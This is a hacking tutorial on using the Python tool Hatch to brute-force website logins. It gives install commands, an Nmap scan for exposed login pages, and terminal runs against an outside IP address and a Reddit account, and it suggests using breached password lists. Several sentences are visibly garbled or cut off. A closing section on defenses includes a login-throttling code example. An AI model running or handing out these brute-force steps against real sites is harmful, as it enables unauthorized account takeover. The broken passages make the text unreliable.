How to Brute-Force Nearly Any Website Login with Hatch «Null Bytes :: WonderHowTo



The tactic of brute-forcing a login, i.e., trying many passwords very fast until the correct one is discovered, can be easy for services like SSH or Telnet. For a website login page, we must identify different elements of the page first.

How Brute-Force Attacks Work

Brute-force attacks take advantage of automation to try many more passwords than a human could. A more targeted brute-force attack that uses a technique to check for weak passwords is often the first attack a hacker wants to try against a system.

A brute-force attack against a service like SSH can be run directly from tools like Sshtrix against an SSH server using the built-in password list, making services with bad passwords very likely to be broken into.

The biggest downside to a brute-force attack is that if the password does not exist in the password list, the attack will fail. Brute-force attacks can quickly become too expensive in time and resources to use. Another downside is that many services fail to do so, which can only slow down a brute-force attack.

Why Brute-Force Attacks Are Harder on Websites

While it's easy to attack a service that takes a username and password over the command line, there is a lot more going on in the code of a website. To design this attack, we need to think about what the script needs to know to do its job.

Submitting it until we get a successful result.

After we do this, we need to submit the guess by clicking on the "Login" button on the page. Finally, we need to know the difference between a failure and a success, so we can stop the script and identify the correct password guess.

All this is a lot more work and quite confusing for beginners, but after SSH service.

Hatch for Brute-Forcing Web Logins

Python is an ideal language for automating this kind of attack, and Hatch uses Python2 to automate the Chrome web browser to stage a brute-force attack against the login of any webpage with a visible login form.

Upon launching Hatch, the script opens a Chrome window for you to inspect the elements of the page you are targeting. After telling the script what site you want to brute-force a login to, it will check to see if it exists and is accessible. If it is, Hatch will ask what you want to do, and then request a list of passwords to try during the attack.

begin automating the attack. You can sit back and watch the attack unfold either in the Chrome window or the terminal that is running the attack. In the terminal, you can watch each password attempt as the script progresses down the list.

What You'll Need

While Hatch is cross-platform, it was a little complicated to set up on some systems.

To follow this guide, you'll need a Windows system with Chrome and Python 2 installed. The current version of Python is Python3, so you'll need to use the right version when you execute the script. If you run Hatch with Python3, it will not work properly.

You'll need to install a few dependencies programmatically.

Step 1: Check Your Version of Python

First, we'll need to install a few dependencies. To take care of these, press the Windows key or click the Start menu, then type cmd. At the prompt, make sure you have Python2 installed correctly by typing python2 into the terminal window.

If you do not, you can download Python2. Once your Python2 is installed, type the following commands to install dependencies.

 pip2 install selenium
pip2 install requests 

Step 2: Install the Chrome Driver

Next, we'll need to install the Chrome driver for the Python program. To do this, download a file from the Chrome Driver website, and then create a folder called webdrivers on your C drive. Move the downloaded file into this folder.

Step 3: Download Hatch & Install

To install Hatch, you can change directory to your C drive before cloning it to make sure you can find it, or change to another location that you'll be able to find. Type cd .. to go to the drive of your computer, if that's where you want it.

 git clone https://github.com/nsgodshall/Hatch.git

This forked version has been modified to work on Windows. Type cd Hatch to change directories into the download folder.

Step 4: Run Hatch & Select Your Router Login

Now that we have Hatch on our system and all of the dependencies installed, it's time to run Hatch and look at the way it works.

 python2 main.py -h 

 C:\Users\Nick\Documents\PythonScripts\Hatch (master -> origin)
λ python2 main.py -h
Usage: main.py [options]

Options:
  -h, --help            show this help message and exit
  -u USERNAME, --username=USERNAME Choose the username
  --usernamesel=USERNAMESEL Choose the username selector
  --passsel=PASSSEL     Choose the password selector
  --loginsel=LOGINSEL   Choose the login button selector
  --passlist=PASSLIST   Enter the password list directory
  --website=WEBSITE     choose a website

We can see the main options for Hatch here.

A good target to test this on is a device on your local network. You can find one by running Nmap on the network to find any IP addresses that have port 80 open. While port 80 is the most common port for web access, you can also search for ports 81, 8080, 8081, and 443 to locate the login pages of various devices.

Next, we'll need to find the subnet range so that we can scan the local network. To find this, you can use ipcalc to calculate your subnet range after finding your computer's local IP address. If your IP address is 192.168.0.3, you can run ipcalc 192.168.0.3 to get the IP range for all possible IP addresses on that network. In this case, that would be 192.168.0.0/24.

Once you know the range, run the following command, with the iprange section changed to the IP range of your network.

 sudo nmap -p 80,8080,81,8081,443 iprange 

When this scan returns, any service that lists the port as "open" should be hosting a website. Navigate to one as you would like it to be in the Nmap.

Step 5: Identify the Login Elements

Now, we can run Hatch, but we'll still need some more information in order to pull off this attack.

 python2 main.py 

A Google Chrome window should open, allowing us to navigate to a website we want to attack and begin

 C:\Users\Nick\Documents\PythonScripts\Hatch (master -> origin)
λ python2 main.py -h

DevTools listening on ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f

  _ _ _ _
 | | | | | | | |
 | | __ | | ___ | | _ ___ | | __
 | __ | / _` | __ / __ | '_ 
 | | | | (_ | | || (__ | | | |
 | _ | | _ |  __, _ |  __  ___ | _ | | _ |
  [-] -> V.1.0
  [-] -> coded by Metachar
  [-] -> brute-force tool

[~] Enter a website: 

Enter the URL of the target site's login page into the first prompt from Hatch. It will check to make sure the website exists and can be accessed.

On our target login page, right-click on the "Username" element, then click on "Inspect."

Next, click on the ellipsis (•••) to the left of the window, and a drop-down menu will appear. Click on "Copy," and then "Copy selector" to copy what Hatch will need to select and interact with this element. It should look something like "#username."

Enter the username selector into Hatch, and then repeat the process with the "Password" selector.

 C:\Users\Nick\Documents\PythonScripts\Hatch (master -> origin)
λ python2 main.py -h

DevTools listening on ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f

  _ _ _ _
 | | | | | | | |
 | | __ | | ___ | | _ ___ | | __
 | __ | / _` | __ / __ | '_ 
 | | | | (_ | | || (__ | | | |
 | _ | | _ |  __, _ |  __  ___ | _ | | _ |
  [-] -> V.1.0
  [-] -> coded by Metachar
  [-] -> brute-force tool

[~] Enter a website: http://202.216.246.99/
[!] Checking if site exists [OK]
[~] Enter the username selector: #username
[~] Enter the password selector: #passwd
[~] Enter the login button selector: 

Finally, right-click on the "Login" button to get the selector information, and add that to Hatch as well.

Now that we've selected the elements, we'll set the username that we're trying to brute-force. In this case, we'll just type admin. The final step will be to select the default list that comes with Hatch. This is "passlist.txt" by default.

 C:\Users\Nick\Documents\PythonScripts\Hatch (master -> origin)
λ python2 main.py -h

DevTools listening on ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f

  _ _ _ _
 | | | | | | | |
 | | __ | | ___ | | _ ___ | | __
 | __ | / _` | __ / __ | '_ 
 | | | | (_ | | || (__ | | | |
 | _ | | _ |  __, _ |  __  ___ | _ | | _ |
  [-] -> V.1.0
  [-] -> coded by Metachar
  [-] -> brute-force tool

[~] Enter a website: http://202.216.246.99/
[!] Checking if site exists [OK]
[~] Enter the username selector: #username
[~] Enter the password selector: #passwd
[~] Enter the Login button selector: #login_ok
[~] Enter the username to brute-force: admin
[~] Enter a directory to a password list: passlist.txt

DevTools listening on ws://127.0.0.1:7827/devtools/browser/0d90faa9-4f25-41a6-bd30-444cdff7705d

DevTools listening on ws://127.0.0.1:7848/devtools/browser/33d370d5-46db-4d56-b5f4-a78554e07316

This password list is not huge, but it does contain many common passwords. Press return and Hatch will open a new window to begin brute-forcing the password. Hatch is automating.

 C:\Users\Nick\Documents\PythonScripts\Hatch (master -> origin)
λ python2 main.py -h

DevTools listening on ws://127.0.0.1:6735/devtools/browser/24db43f7-d0d7-4756-8a2c-94676e65bb8f

  _ _ _ _
 | | | | | | | |
 | | __ | | ___ | | _ ___ | | __
 | __ | / _` | __ / __ | '_ 
 | | | | (_ | | || (__ | | | |
 | _ | | _ |  __, _ |  __  ___ | _ | | _ |
  [-] -> V.1.0
  [-] -> coded by Metachar
  [-] -> brute-force tool

[~] Enter a website: http://202.216.246.99/
[!] Checking if site exists [OK]
[~] Enter the username selector: #username
[~] Enter the password selector: #passwd
[~] Enter the Login button selector: #login_ok
[~] Enter the username to brute-force: admin
[~] Enter a directory to a password list: passlist.txt

DevTools listening on ws://127.0.0.1:7827/devtools/browser/0d90faa9-4f25-41a6-bd30-444cdff7705d

DevTools listening on ws://127.0.0.1:7848/devtools/browser/33d370d5-46db-4d56-b5f4-a78554e07316
------------------------
Tried password: 123456
for user: admin
------------------------
------------------------
Tried password: password
for user: admin
------------------------
------------------------
Tried password: qwerty
for user: admin
------------------------
------------------------
Tried password: Hackthis1
for user: admin 

Step 6: Update Your Wordlist & Run Against an External Website

If you're not happy with the wordlist included in Hatch, you can add to it in a text editor like Nano, or add another wordlist from any repository of wordlists, such as those leaked from data breaches. After downloading a wordlist of your choice, you can add it to the "Hatch" folder, and select it instead of the default list.

Once you've got a password list you're happy with, test it on a common website. Create a throwaway account on Reddit.com or another site, and remember the login name.

After the dummy account is set up, run Hatch again and enter reddit.com/login (or the login page for the website you chose). Next, paste the selectors into the login, password, and button selector prompts. Finally, enter the target username, and select the password list containing the right credentials. Press return and the script should open a Chrome window and begin automating the attack.

Once the script detects a successful login, it will output the password that succeeded. Windows, my friend Nick modified the code to prevent this from happening in his forked version. If you get any weirdness from the forked version, you can always try the original Hatch version.

 ⠀⠀_ _ _ _
 | | | | | | | |
 | | __ | | ___ | | _ ___ | | __
 | __ | / _` | __ / __ | '_ 
 | | | | (_ | | || (__ | | | |
 | _ | | _ |  __, _ |  __  ___ | _ | | _ |
  [-] -> V.1.0
  [-] -> coded by Metachar
  [-] -> brute-force tool

[~] Enter a website: http://www.reddit.com/login
[!] Checking if site exists
[~] Enter the username selector: #loginUsername
[~] Enter the password selector: #loginPassword
[~] Enter the Login button selector: body > div > div > div.PageColumn.PageColumn__right > div > form > fieldset:nth-child(10) > button
[~] Enter the username to brute-force: hackthisaccountNB
[~] Enter a directory to a password list: passlist.txt

DevTools listening on ws://127.0.0.1:11301/devtools/browser/6fd2f19e-9fef-4921-863f-d3316ec3b808

DevTools listening on ws://127.0.0.1:11318/devtools/browser/f8d672c9-8e46-477c-a93d-baf0ea6b50e1
------------------------
Tried password: 123456
for user: hackthisaccountNB
------------------------
------------------------
Tried password: password
for user: hackthisaccountNB
------------------------
------------------------
Tried password: qwerty
for user: hackthisaccountNB
------------------------
THIS COULD MEAN 2 THINGS THE PASSWORD WAS FOUND OR YOU HAVE BEEN LOCKED OUT OF ATTEMPTS!
LAST PASS ATTEMPT BELOW
Password has been found: qwerty

Have fun:) 

How to Defend Against Brute-Forcing

Sites have the best ability to defend against these attacks by establishing common sense brute-forcing safeguards. Should a normal user be able to log in with the wrong password?
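One way a site could implement such a safeguard, as an added example that is not part of the original article or of Hatch: a sliding-window limiter on failed logins with exponentially growing lockouts, replayed against a constructed guess sequence. The names LoginThrottle and simulate, the thresholds, and the sample address 192.0.2.10 are assumptions made for illustration.

```python
import time
from collections import defaultdict, deque

class LoginThrottle:
    """Sliding-window failed-login limiter keyed by account and by source IP."""
    def __init__(self, max_failures=5, window=300, base_lockout=60, max_lockout=3600):
        self.max_failures, self.window = max_failures, window
        self.base_lockout, self.max_lockout = base_lockout, max_lockout
        self._failures = defaultdict(deque)  # key -> timestamps of recent failures
        self._locked_until = {}              # key -> time the lock expires
        self._strikes = defaultdict(int)     # key -> lockouts so far (drives backoff)

    def _keys(self, username, ip):
        # Track account and source separately, so guesses spread over many IPs
        # still trip the account key.
        return (("user", username.lower()), ("ip", ip))

    def retry_after(self, username, ip, now=None):
        """Seconds to wait before another attempt is evaluated (0 = allowed)."""
        now = time.time() if now is None else now
        waits = [self._locked_until.get(k, 0) - now for k in self._keys(username, ip)]
        return max(0, max(waits))

    def record_failure(self, username, ip, now=None):
        now = time.time() if now is None else now
        for key in self._keys(username, ip):
            recent = self._failures[key]
            recent.append(now)
            while recent[0] <= now - self.window:  # drop failures outside the window
                recent.popleft()
            if len(recent) >= self.max_failures:
                self._strikes[key] += 1  # each lockout doubles the next one
                lock = min(self.base_lockout * 2 ** (self._strikes[key] - 1), self.max_lockout)
                self._locked_until[key] = now + lock
                recent.clear()

    def record_success(self, username, ip):
        # Reset only the account key; the IP key keeps its failure history.
        for table in (self._failures, self._strikes):
            table.pop(("user", username.lower()), None)

def simulate(passwords, real_password, throttle, username="admin", ip="192.0.2.10"):
    """Replay one guess per second (constructed input); return (checked, found)."""
    checked = 0
    for t, guess in enumerate(passwords):
        if throttle.retry_after(username, ip, now=t) > 0:
            continue  # rejected before the password is compared at all
        checked += 1
        if guess == real_password:  # stand-in for the site's real credential check
            throttle.record_success(username, ip)
            return checked, True
        throttle.record_failure(username, ip, now=t)
    return checked, False
```

With the default thresholds, a 100-entry list replayed at one guess per second gets only 10 guesses evaluated. Because the account key can also be tripped by someone other than the owner, sites usually pair this with a recovery path or a second factor.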

On the user side, picking strong, random passwords and saving them in a password manager can help make sure your password never ends up in a brute-forcing list. In general, using two-factor authentication whenever possible is your best defense against these sorts of tactics, as you'll be alerted to the login attempt. For important accounts, you should always have two-factor authentication enabled.

Hatch for automating brute-force attacks against web logins! Twitter @KodyKinzie

Cover photo and screenshots by Kody / Null Byte